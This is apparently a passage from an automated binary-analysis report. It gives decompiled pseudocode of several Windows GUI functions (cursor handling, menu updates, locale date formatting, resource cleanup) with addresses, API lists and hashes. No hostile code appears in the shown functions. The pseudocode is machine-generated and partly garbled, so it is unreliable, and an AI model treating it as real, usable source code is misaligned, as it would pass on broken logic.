								_t186 = E00403604( *((intOrPtr*)(_t302 + 4)), _t278);
								__eflags = _t186;
								if(_t186 == 0) {
									E0042BE68(_t295, 0);
								} else {
									E00447C6C(_t295,  &_v20);
								}
							}
						}
					}
					goto L47;
				}
				_t191 = _t125 - 0x20;
				if(_t191 == 0) {
					GetCursorPos( &_v16);
					E0042BA9C( *((intOrPtr*)(_v8 + 0x14)),  &_v72,  &_v16);
					_v16.x = _v72;
					_v16.y = _v68;
					__eflags =  *((short*)(_t242 + 8)) - 1;
					if( *((short*)(_t242 + 8)) != 1) {
						goto L47;
					}
					__eflags = E0043260C( *((intOrPtr*)(_v8 + 0x14))) -  *((intOrPtr*)(_t242 + 4));
					if(__eflags != 0) {
						goto L47;
					}
					__eflags = E0043113C( *((intOrPtr*)(_v8 + 0x14)),  &_v72, __eflags);
					if(__eflags <= 0) {
						goto L47;
					}
					_t303 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t303;
					if(_t303 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(_v20 != 0x12) {
						goto L47;
					}
					_t209 =  *0x47a0fc; // 0x47bba0
					SetCursor(E00449384( *_t209,  &_v20,  *((short*)(0x479a80 + ( *( *((intOrPtr*)(_t303 + 0x14)) + 0x10) & 0x000000ff) * 2))));
					 *((intOrPtr*)(_t242 + 0xc)) = 1;
					goto L49;
				}
				_t213 = _t191 - 0x1e0;
				if(_t213 == 0) {
					_t214 = _v8;
					__eflags =  *(_t214 + 0x60);
					if( *(_t214 + 0x60) != 0) {
						E0043622C(_v8);
						E00406B50( *((intOrPtr*)(_t242 + 8)), 0,  &_v72);
						_t219 = _v8;
						 *(_t219 + 0x50) = _v72;
						 *((intOrPtr*)(_t219 + 0x54)) = _v68;
						E004366B4(_t306);
						E0043622C(_v8);
					}
					goto L47;
				}
				if(_t213 == 1) {
					E00406B50( *((intOrPtr*)(__edx + 8)), 0,  &_v16);
					_t256 =  &_v20;
					_t304 = E004351D4(_v8,  &_v20,  &_v16, __eflags);
					__eflags = _t304;
					if(_t304 == 0) {
						goto L47;
					}
					__eflags = _v20 - 0x12;
					if(__eflags != 0) {
						__eflags = _v20 - 2;
						if(_v20 != 2) {
							goto L47;
						}
						_t232 = PeekMessageA( &_v64, E0043260C( *((intOrPtr*)(_v8 + 0x14))), 0x203, 0x203, 0);
						__eflags = _t232;
						if(_t232 == 0) {
							_t289 =  *0x428474; // 0x4284c0
							_t236 = E00403604( *((intOrPtr*)(_t304 + 4)), _t289);
							__eflags = _t236;
							if(_t236 != 0) {
								 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t304 + 4)))) + 0xc4))();
							}
						}
						_t233 =  *((intOrPtr*)(_t304 + 4));
						__eflags =  *((char*)(_t233 + 0x9b)) - 1;
						if( *((char*)(_t233 + 0x9b)) == 1) {
							__eflags =  *((char*)(_t233 + 0x5d)) - 1;
							if( *((char*)(_t233 + 0x5d)) == 1) {
								E0042C5B8(_t233, _t256 | 0xffffffff, 0, _t306, _t315);
							}
						}
						goto L49;
					}
					E00436118(_v8,  &_v16, _t304, __eflags);
				} else {
				}
			}

0x00436744
0x00436745
0x0043674f
0x00436752
0x00436754
0x00436759
0x0043675a
0x0043675f
0x00436762
0x00436765
0x00436767
0x0043676c
0x00436790
0x00436790
0x00436795
0x00436816
0x00436829
0x0043682b
0x0043682d
0x00436833
0x00436837
0x0043683d
0x00436841
0x00436847
0x00436855
0x00436855
0x00436841
0x00436837
0x00436af1
0x00436af9
0x00436b03
0x00436b03
0x00436b06
0x00436b08
0x00436b0b
0x00436b0e
0x00436b1b
0x00436b1b
0x00436797
0x00436797
0x0043679c
0x00436a2f
0x00436a32
0x00436a36
0x00000000
0x00000000
0x00436a4d
0x00436a4f
0x00436a53
0x00436a65
0x00436a67
0x00000000
0x00000000
0x00436a70
0x00436a70
0x00436a73
0x00436a7e
0x00436a83
0x00436a92
0x00436a9c
0x00436aa7
0x00436ab7
0x00436ac7
0x00436acf
0x00436add
0x00436aeb
0x00436aec
0x00436aed
0x00436aee
0x00000000
0x00436aee
0x00436a75
0x00436a78
0x00000000
0x00000000
0x00000000
0x00436a78
0x00436a5b
0x00000000
0x004367a2
0x004367a2
0x004367a5
0x004367ab
0x004367ae
0x004367b4
0x004367c3
0x004367c3
0x004367b4
0x00000000
0x004367a5
0x0043679c
0x0043676e
0x00436912
0x00436916
0x00436976
0x00436918
0x0043691e
0x00436931
0x00436933
0x00436935
0x0043693b
0x0043693f
0x00436945
0x0043694a
0x00436950
0x00436955
0x00436957
0x00436969
0x00436959
0x0043695b
0x0043695b
0x00436957
0x0043693f
0x00436935
0x00000000
0x00436916
0x00436774
0x00436777
0x00436984
0x00436995
0x0043699d
0x004369a3
0x004369a6
0x004369ab
0x00000000
0x00000000
0x004369bc
0x004369bf
0x00000000
0x00000000
0x004369d0
0x004369d2
0x00000000
0x00000000
0x004369e6
0x004369e8
0x004369ea
0x00000000
0x00000000
0x004369f0
0x004369f4
0x00000000
0x00000000
0x00436a09
0x00436a16
0x00436a1b
0x00000000
0x00436a1b
0x0043677d
0x00436782
0x004367cd
0x004367d0
0x004367d4
0x004367dd
0x004367e8
0x004367ed
0x004367f3
0x004367f9
0x004367fd
0x00436806
0x00436806
0x00000000
0x004367d4
0x00436785
0x00436865
0x0043686a
0x00436878
0x0043687a
0x0043687c
0x00000000
0x00000000
0x00436882
0x00436886
0x0043689a
0x0043689e
0x00000000
0x00000000
0x004368c0
0x004368c5
0x004368c7
0x004368cc
0x004368d2
0x004368d7
0x004368d9
0x004368e0
0x004368e0
0x004368d9
0x004368e6
0x004368e9
0x004368f0
0x004368f6
0x004368fa
0x00436905
0x00436905
0x004368fa
0x00000000
0x004368f0
0x00436890
0x00000000
0x0043678b

APIs

GetCursorPos.USER32(?), ref: 00436984
SetCursor.USER32(00000000,?,00000000,00436B1C), ref: 00436A16

Strings

0D, xrefs: 0043694A

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Cursor
String ID: 0D
API String ID: 3268636600-523618118
Opcode ID: 08cfc9af08fe138c179c14b782fee68908b324e32496a2abbcf1515e0a50ea97
Instruction ID: 787c8efa0447c5c4f655f70895a78cbb7319bcc81ea4666ae08ec2f48b013013
Opcode Fuzzy Hash: 08cfc9af08fe138c179c14b782fee68908b324e32496a2abbcf1515e0a50ea97
Instruction Fuzzy Hash: 66C16130A00216EFCB10EF69C98599EB7F1BF09304F56D56AE801AB355DB78EE41CB49

Uniqueness

Uniqueness Score: -1.00%

Function 0044C1CC, Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 282
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E0044C1CC(char __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				struct tagPOINT _v32;
				char _v33;
				intOrPtr _v40;
				char _v44;
				intOrPtr _v48;
				struct HWND__* _v52;
				intOrPtr _v56;
				char _v60;
				struct tagRECT _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				int _v88;
				int _v92;
				intOrPtr _v96;
				char _v100;
				struct tagRECT _v116;
				char _v132;
				intOrPtr _v136;
				char _v140;
				char _v144;
				char _v148;
				struct HWND__* _t130;
				struct HWND__* _t166;
				intOrPtr _t188;
				char _t194;
				intOrPtr _t218;
				intOrPtr _t222;
				void* _t238;
				intOrPtr* _t250;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr _t278;
				struct tagRECT* _t301;
				intOrPtr* _t305;
				intOrPtr _t306;
				void* _t313;

				_t312 = _t313;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v144 = 0;
				_v148 = 0;
				asm("movsd");
				asm("movsd");
				_v8 = __eax;
				_t269 =  *0x442070; // 0x442074
				E00404B50( &_v100, _t269);
				_t250 =  &_v8;
				_push(_t313);
				_push(0x44c552);
				_push( *[fs:eax]);
				 *[fs:eax] = _t313 + 0xffffff70;
				 *((char*)( *_t250 + 0x58)) = 0;
				if( *((char*)( *_t250 + 0x88)) == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0 || E00442448() == 0 || E00449ADC(E0042A804( &_v16, 1)) !=  *((intOrPtr*)( *_t250 + 0x60))) {
					L23:
					_t130 = _v52;
					__eflags = _t130;
					if(_t130 <= 0) {
						E0044BF10( *_t250);
					} else {
						E0044BD18( *_t250, 0, _t130);
					}
					goto L26;
				} else {
					_v100 =  *((intOrPtr*)( *_t250 + 0x60));
					_v92 = _v16;
					_v88 = _v12;
					_v88 = _v88 + E0044BF48();
					_v84 = E00448E70();
					_v80 =  *((intOrPtr*)( *_t250 + 0x5c));
					E0042B8F8( *((intOrPtr*)( *_t250 + 0x60)),  &_v132);
					_t301 =  &_v76;
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
					 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)))) + 0x40))();
					_v32.x = 0;
					_v32.y = 0;
					_t305 =  *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x60)) + 0x30));
					_t319 = _t305;
					if(_t305 == 0) {
						_t306 =  *((intOrPtr*)( *_t250 + 0x60));
						_t278 =  *0x428474; // 0x4284c0
						_t166 = E00403604(_t306, _t278);
						__eflags = _t166;
						if(_t166 != 0) {
							__eflags =  *(_t306 + 0x190);
							if( *(_t306 + 0x190) != 0) {
								ClientToScreen( *(_t306 + 0x190),  &_v32);
							}
						}
					} else {
						 *((intOrPtr*)( *_t305 + 0x40))();
					}
					OffsetRect( &_v76, _v32.x - _v24, _v32.y - _v20);
					E0042BA9C( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v16);
					_v60 = _v140;
					_v56 = _v136;
					E00449AA4( *((intOrPtr*)( *_t250 + 0x60)),  &_v148);
					E00429078(_v148,  &_v140,  &_v144, _t319);
					E00404278( &_v44, _v144);
					_v52 = 0;
					_v48 =  *((intOrPtr*)( *_t250 + 0x74));
					_t188 =  *0x479ba0; // 0x4289f8
					_v96 = _t188;
					_v40 = 0;
					_t257 = 0;
					_v33 = E0042D0C4( *((intOrPtr*)( *_t250 + 0x60)), 0, 0xb030,  &_v100) == 0;
					if(_v33 != 0 &&  *((short*)( *_t250 + 0x132)) != 0) {
						_t257 =  &_v33;
						 *((intOrPtr*)( *_t250 + 0x130))( &_v100);
					}
					if(_v33 == 0 ||  *((intOrPtr*)( *_t250 + 0x60)) == 0) {
						_t194 = 0;
					} else {
						_t194 = 1;
					}
					_t284 =  *_t250;
					 *((char*)( *_t250 + 0x58)) = _t194;
					if( *((char*)( *_t250 + 0x58)) == 0) {
						goto L23;
					} else {
						_t326 = _v44;
						if(_v44 == 0) {
							goto L23;
						}
						E0044C0A8(_v96, _t257, _t284, _t312);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0x70))();
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd8))( &_v116, _v40);
						OffsetRect( &_v116, _v92, _v88);
						if(E00403674( *((intOrPtr*)( *_t250 + 0x84)), _t326) != 0) {
							_t238 = E0044C108(_v44, _t250, _t301, 0xffc8, _t312) + 5;
							_v116.left = _v116.left - _t238;
							_v116.right = _v116.right - _t238;
						}
						E0042BA70( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &_v76);
						_t218 =  *_t250;
						 *((intOrPtr*)(_t218 + 0x64)) = _v140;
						 *((intOrPtr*)(_t218 + 0x68)) = _v136;
						E0042BA70( *((intOrPtr*)( *_t250 + 0x60)),  &_v140,  &(_v76.right));
						_t222 =  *_t250;
						 *((intOrPtr*)(_t222 + 0x6c)) = _v140;
						 *((intOrPtr*)(_t222 + 0x70)) = _v136;
						E0042C0BC( *((intOrPtr*)( *_t250 + 0x84)), _v80);
						 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *_t250 + 0x84)))) + 0xd4))(_v40);
						E00449BF0(_v44);
						_t231 = _v52;
						if(_v52 <= 0) {
							E0044BD18( *_t250, 1, _v48);
						} else {
							E0044BD18( *_t250, 0, _t231);
						}
						L26:
						_pop(_t270);
						 *[fs:eax] = _t270;
						_push(0x44c559);
						E00404204( &_v148, 2);
						_t272 =  *0x442070; // 0x442074
						return E00404C20( &_v100, _t272);
					}
				}
			}

0x0044c1cd
0x0044c1d5
0x0044c1d6
0x0044c1d7
0x0044c1da
0x0044c1e0
0x0044c1eb
0x0044c1ec
0x0044c1ed
0x0044c1f3
0x0044c1f9
0x0044c1fe
0x0044c203
0x0044c204
0x0044c209
0x0044c20c
0x0044c211
0x0044c21e
0x0044c50b
0x0044c50b
0x0044c50e
0x0044c510
0x0044c521
0x0044c512
0x0044c518
0x0044c518
0x00000000
0x0044c257
0x0044c25c
0x0044c262
0x0044c268
0x0044c270
0x0044c27d
0x0044c285
0x0044c290
0x0044c298
0x0044c29b
0x0044c29c
0x0044c29d
0x0044c29e
0x0044c2a9
0x0044c2ae
0x0044c2b3
0x0044c2bb
0x0044c2be
0x0044c2c0
0x0044c2d0
0x0044c2d5
0x0044c2db
0x0044c2e0
0x0044c2e2
0x0044c2e4
0x0044c2eb
0x0044c2f8
0x0044c2f8
0x0044c2eb
0x0044c2c2
0x0044c2c9
0x0044c2c9
0x0044c30f
0x0044c322
0x0044c32d
0x0044c336
0x0044c344
0x0044c355
0x0044c363
0x0044c36a
0x0044c372
0x0044c375
0x0044c37a
0x0044c37f
0x0044c38b
0x0044c399
0x0044c3a1
0x0044c3b3
0x0044c3c1
0x0044c3c1
0x0044c3cb
0x0044c3d5
0x0044c3d9
0x0044c3d9
0x0044c3d9
0x0044c3db
0x0044c3dd
0x0044c3e6
0x00000000
0x0044c3ec
0x0044c3ec
0x0044c3f0
0x00000000
0x00000000
0x0044c3fa
0x0044c412
0x0044c42d
0x0044c43f
0x0044c457
0x0044c463
0x0044c466
0x0044c469
0x0044c469
0x0044c47a
0x0044c47f
0x0044c487
0x0044c490
0x0044c4a1
0x0044c4a6
0x0044c4ae
0x0044c4b7
0x0044c4c5
0x0044c4de
0x0044c4e4
0x0044c4e9
0x0044c4ee
0x0044c504
0x0044c4f0
0x0044c4f6
0x0044c4f6
0x0044c526
0x0044c528
0x0044c52b
0x0044c52e
0x0044c53e
0x0044c546
0x0044c551
0x0044c551
0x0044c3e6

APIs

Part of subcall function 00442448: GetActiveWindow.USER32 ref: 0044244B
Part of subcall function 00442448: GetCurrentThreadId.KERNEL32 ref: 00442460

Part of subcall function 0044BF48: GetCursor.USER32(?), ref: 0044BF63
Part of subcall function 0044BF48: GetIconInfo.USER32(00000000,?), ref: 0044BF69

ClientToScreen.USER32(?,?), ref: 0044C2F8
OffsetRect.USER32(?,?,?), ref: 0044C30F
OffsetRect.USER32(?,?,?), ref: 0044C43F

Part of subcall function 0044BD18: SetTimer.USER32(00000000,00000000,?,00449AFC), ref: 0044BD32

Strings

t D, xrefs: 0044C1F3, 0044C546

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: OffsetRect$ActiveClientCurrentCursorIconInfoScreenThreadTimerWindow
String ID: t D
API String ID: 3022406661-1217181877
Opcode ID: db21225e9c9780066c510f402bfa3ec08bf04bf4dd1dd07f96f862bcea818cc0
Instruction ID: e9d520b035f0d8215a038eea2a8e9f45088717acbf43526da4b5d0842f052af2
Opcode Fuzzy Hash: db21225e9c9780066c510f402bfa3ec08bf04bf4dd1dd07f96f862bcea818cc0
Instruction Fuzzy Hash: 55C10475A002288FDB50DFA9C8C0A9EB7F5BF09304F5481AAE504EB365DB34AD4ACF55

Uniqueness

Uniqueness Score: -1.00%

Function 0040B188, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 148
threadCOMMON

Download Yara Rule

C-Code - Quality: 82%

			E0040B188(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _t41;
				signed int _t45;
				signed int _t47;
				signed int _t49;
				signed int _t51;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				signed int _t83;
				signed int _t92;
				intOrPtr _t111;
				void* _t122;
				void* _t124;
				intOrPtr _t127;
				void* _t128;

				_t128 = __eflags;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_t122 = __edx;
				_t124 = __eax;
				_push(_t127);
				_push(0x40b352);
				_push( *[fs:eax]);
				 *[fs:eax] = _t127;
				_t92 = 1;
				E004041E0(__edx);
				E0040AE50(GetThreadLocale(), 0x40b368, 0x1009,  &_v12);
				if(E00408140(0x40b368, 1, _t128) + 0xfffffffd - 3 < 0) {
					while(1) {
						_t41 = E004044A0(_t124);
						__eflags = _t92 - _t41;
						if(_t92 > _t41) {
							goto L28;
						}
						__eflags =  *(_t124 + _t92 - 1) & 0x000000ff;
						asm("bt [0x479110], eax");
						if(( *(_t124 + _t92 - 1) & 0x000000ff) >= 0) {
							_t45 = E00408790(_t124 + _t92 - 1, 2, 0x40b36c);
							__eflags = _t45;
							if(_t45 != 0) {
								_t47 = E00408790(_t124 + _t92 - 1, 4, 0x40b37c);
								__eflags = _t47;
								if(_t47 != 0) {
									_t49 = E00408790(_t124 + _t92 - 1, 2, 0x40b394);
									__eflags = _t49;
									if(_t49 != 0) {
										_t51 =  *(_t124 + _t92 - 1) - 0x59;
										__eflags = _t51;
										if(_t51 == 0) {
											L24:
											E004044A8(_t122, 0x40b3ac);
										} else {
											__eflags = _t51 != 0x20;
											if(_t51 != 0x20) {
												E004043C8();
												E004044A8(_t122, _v24);
											} else {
												goto L24;
											}
										}
									} else {
										E004044A8(_t122, 0x40b3a0);
										_t92 = _t92 + 1;
									}
								} else {
									E004044A8(_t122, 0x40b38c);
									_t92 = _t92 + 3;
								}
							} else {
								E004044A8(_t122, 0x40b378);
								_t92 = _t92 + 1;
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						} else {
							_v8 = E0040C220(_t124, _t92);
							E00404700(_t124, _v8, _t92,  &_v20);
							E004044A8(_t122, _v20);
							_t92 = _t92 + _v8;
						}
					}
				} else {
					_t75 =  *0x47b73c; // 0x9
					_t76 = _t75 - 4;
					if(_t76 == 0 || _t76 + 0xfffffff3 - 2 < 0) {
						_t77 = 1;
					} else {
						_t77 = 0;
					}
					if(_t77 == 0) {
						E00404234(_t122, _t124);
					} else {
						while(_t92 <= E004044A0(_t124)) {
							_t83 =  *(_t124 + _t92 - 1) - 0x47;
							__eflags = _t83;
							if(_t83 != 0) {
								__eflags = _t83 != 0x20;
								if(_t83 != 0x20) {
									E004043C8();
									E004044A8(_t122, _v16);
								}
							}
							_t92 = _t92 + 1;
							__eflags = _t92;
						}
					}
				}
				L28:
				_pop(_t111);
				 *[fs:eax] = _t111;
				_push(E0040B359);
				return E00404204( &_v24, 4);
			}

0x0040b188
0x0040b18d
0x0040b18e
0x0040b18f
0x0040b190
0x0040b191
0x0040b195
0x0040b197
0x0040b19b
0x0040b19c
0x0040b1a1
0x0040b1a4
0x0040b1a7
0x0040b1ae
0x0040b1c6
0x0040b1de
0x0040b328
0x0040b32a
0x0040b32f
0x0040b331
0x00000000
0x00000000
0x0040b247
0x0040b24c
0x0040b253
0x0040b291
0x0040b296
0x0040b298
0x0040b2b7
0x0040b2bc
0x0040b2be
0x0040b2df
0x0040b2e4
0x0040b2e6
0x0040b2fb
0x0040b2fb
0x0040b2fd
0x0040b303
0x0040b30a
0x0040b2ff
0x0040b2ff
0x0040b301
0x0040b318
0x0040b322
0x00000000
0x00000000
0x00000000
0x0040b301
0x0040b2e8
0x0040b2ef
0x0040b2f4
0x0040b2f4
0x0040b2c0
0x0040b2c7
0x0040b2cc
0x0040b2cc
0x0040b29a
0x0040b2a1
0x0040b2a6
0x0040b2a6
0x0040b327
0x0040b327
0x0040b255
0x0040b25e
0x0040b26c
0x0040b276
0x0040b27b
0x0040b27b
0x0040b253
0x0040b1e4
0x0040b1e4
0x0040b1e9
0x0040b1ec
0x0040b1fa
0x0040b1f6
0x0040b1f6
0x0040b1f6
0x0040b1fe
0x0040b239
0x0040b200
0x0040b225
0x0040b206
0x0040b206
0x0040b208
0x0040b20a
0x0040b20c
0x0040b215
0x0040b21f
0x0040b21f
0x0040b20c
0x0040b224
0x0040b224
0x0040b224
0x0040b230
0x0040b1fe
0x0040b337
0x0040b339
0x0040b33c
0x0040b33f
0x0040b351

APIs

GetThreadLocale.KERNEL32(?,00000000,0040B352,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0040B1B7

Part of subcall function 0040AE50: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040AE6E

Strings

ggg, xrefs: 0040B29C
eeee, xrefs: 0040B2C2
yyyy, xrefs: 0040B2A9

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Locale$InfoThread
String ID: eeee$ggg$yyyy
API String ID: 4232894706-1253427255
Opcode ID: d7b13ad06268066e0e3d9545960157c368da61d4444f732cfd4d74e818bfd3be
Instruction ID: ea3283d12c66047e48a26d7514356e13d5da0e45fb844779695d61bf13272dc9
Opcode Fuzzy Hash: d7b13ad06268066e0e3d9545960157c368da61d4444f732cfd4d74e818bfd3be
Instruction Fuzzy Hash: 3741E4703002058BC711AB7A98857BEB2A6DB85308BB4447FE951F77C5DB3CDD0292AE

Uniqueness

Uniqueness Score: -1.00%

Function 0043EF1C, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0043EF1C(intOrPtr* __eax) {
				struct tagMENUITEMINFOA _v128;
				intOrPtr _v132;
				int _t16;
				intOrPtr* _t29;
				struct HMENU__* _t36;
				MENUITEMINFOA* _t37;

				_t37 =  &_v128;
				_t29 = __eax;
				_t16 =  *0x47a120; // 0x47b738
				if( *((char*)(_t16 + 0xd)) != 0 &&  *((intOrPtr*)(__eax + 0x38)) != 0) {
					_t36 =  *((intOrPtr*)( *__eax + 0x34))();
					_t37->cbSize = 0x2c;
					_v132 = 0x10;
					_v128.hbmpUnchecked =  &(_v128.cch);
					_v128.dwItemData = 0x50;
					_t16 = GetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
					if(_t16 != 0) {
						_t16 = E0043F2D0(_t29);
						asm("sbb edx, edx");
						if(_t16 != (_v128.cbSize & 0x00006000) + 1) {
							_v128.cbSize = ((E0043F2D0(_t29) & 0x0000007f) << 0x0000000d) + ((E0043F2D0(_t29) & 0x0000007f) << 0x0000000d) * 0x00000002 | _v128 & 0xffff9fff;
							_v132 = 0x10;
							_t16 = SetMenuItemInfoA(_t36, 0, 0xffffffff, _t37);
							if(_t16 != 0) {
								return DrawMenuBar( *(_t29 + 0x38));
							}
						}
					}
				}
				return _t16;
			}

0x0043ef1e
0x0043ef21
0x0043ef23
0x0043ef2c
0x0043ef43
0x0043ef45
0x0043ef4c
0x0043ef58
0x0043ef5c
0x0043ef6a
0x0043ef71
0x0043ef75
0x0043ef87
0x0043ef8c
0x0043efaa
0x0043efae
0x0043efbc
0x0043efc3
0x00000000
0x0043efc9
0x0043efc3
0x0043ef8c
0x0043ef71
0x0043efd6

APIs

GetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EF6A
SetMenuItemInfoA.USER32(00000000,00000000,000000FF), ref: 0043EFBC
DrawMenuBar.USER32(00000000), ref: 0043EFC9

Strings

P, xrefs: 0043EF5C

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Menu$InfoItem$Draw
String ID: P
API String ID: 3227129158-3110715001
Opcode ID: 19572b5fd4325c5a85f5497dada60b5f77a4a60905ed85047c09cfceccd68024
Instruction ID: 33f587be619990b3f930e4c4d0f8775a3a4c2119ffd5e702ead2e88aede24f5a
Opcode Fuzzy Hash: 19572b5fd4325c5a85f5497dada60b5f77a4a60905ed85047c09cfceccd68024
Instruction Fuzzy Hash: 281194306052006FD310DB2ACC85B5B76D4AF89368F149A7AF095DB3E9D779C854C74A

Uniqueness

Uniqueness Score: -1.00%

Function 00421F0C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E00421F0C(void* __ebx, void* __ecx, void* __edx) {
				intOrPtr _t3;
				intOrPtr _t5;
				intOrPtr _t7;
				intOrPtr _t10;
				intOrPtr _t12;
				intOrPtr _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				void* _t20;
				void* _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t38;

				_t27 = __ecx;
				_push(_t38);
				_push(0x421fd5);
				_push( *[fs:eax]);
				 *[fs:eax] = _t38;
				 *0x47b8ac =  *0x47b8ac + 1;
				if( *0x47b8ac == 0) {
					_t3 =  *0x47b904; // 0x2320aa8
					E0040346C(_t3);
					_t5 =  *0x4796cc; // 0x0
					E0040346C(_t5);
					_t7 =  *0x4796c8; // 0x0
					E0040346C(_t7);
					E0041F014(__ebx, _t27);
					_t10 =  *0x4796d0; // 0x2320acc
					E0040346C(_t10);
					_t12 =  *0x47b900; // 0x2320b08
					E0040346C(_t12);
					_t14 =  *0x47b8f4; // 0x2320a30
					E0040346C(_t14);
					_t16 =  *0x47b8f8; // 0x2320a58
					E0040346C(_t16);
					_t18 =  *0x47b8fc; // 0x2320a80
					E0040346C(_t18);
					_t20 =  *0x47b8a8; // 0x93080724
					DeleteObject(_t20);
					_push(0x47b8c4);
					L00406284();
					_push(0x47b8dc);
					L00406284();
					_t34 =  *0x4129e8; // 0x4129ec
					E00404C6C(0x4795e8, 0x12, _t34);
					_t35 =  *0x4129e8; // 0x4129ec
					E00404C6C(0x479448, 0x34, _t35);
				}
				_pop(_t33);
				 *[fs:eax] = _t33;
				_push(0x421fdc);
				return 0;
			}

0x00421f0c
0x00421f11
0x00421f12
0x00421f17
0x00421f1a
0x00421f1d
0x00421f23
0x00421f29
0x00421f2e
0x00421f33
0x00421f38
0x00421f3d
0x00421f42
0x00421f47
0x00421f4c
0x00421f51
0x00421f56
0x00421f5b
0x00421f60
0x00421f65
0x00421f6a
0x00421f6f
0x00421f74
0x00421f79
0x00421f7e
0x00421f84
0x00421f89
0x00421f8e
0x00421f93
0x00421f98
0x00421fa7
0x00421fad
0x00421fbc
0x00421fc2
0x00421fc2
0x00421fc9
0x00421fcc
0x00421fcf
0x00421fd4

APIs

DeleteObject.GDI32(93080724), ref: 00421F84
RtlDeleteCriticalSection.NTDLL(0047B8C4), ref: 00421F8E
RtlDeleteCriticalSection.NTDLL(0047B8DC), ref: 00421F98

Strings

)A, xrefs: 00421FA7, 00421FBC

Memory Dump Source

Source File: 00000000.00000002.636838515.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.636834720.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.636901812.0000000000477000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636908133.0000000000486000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.636914146.000000000048D000.00000080.00020000.sdmp Download File
Associated: 00000000.00000002.636918902.000000000048E000.00000004.00020000.sdmp Download File

Similarity

API ID: Delete$CriticalSection$Object
String ID: )A
API String ID: 378701848-2712435313
Opcode ID: fe17a8a8c413fea95bf5845a48d02e3332dbe8f1a0394c6c020836c5dc48c030
Instruction ID: 8cb403c4d6bd83fc790e0824a81a94f8238df61aba43c4b3fd4f0466644193af
Opcode Fuzzy Hash: fe17a8a8c413fea95bf5845a48d02e3332dbe8f1a0394c6c020836c5dc48c030
Instruction Fuzzy Hash: 1A0100703051018FC602FF7AEC82A5537A8EB41709B52853AF148AB2B2CB3DAD558F5E

Uniqueness

Uniqueness Score: -1.00%

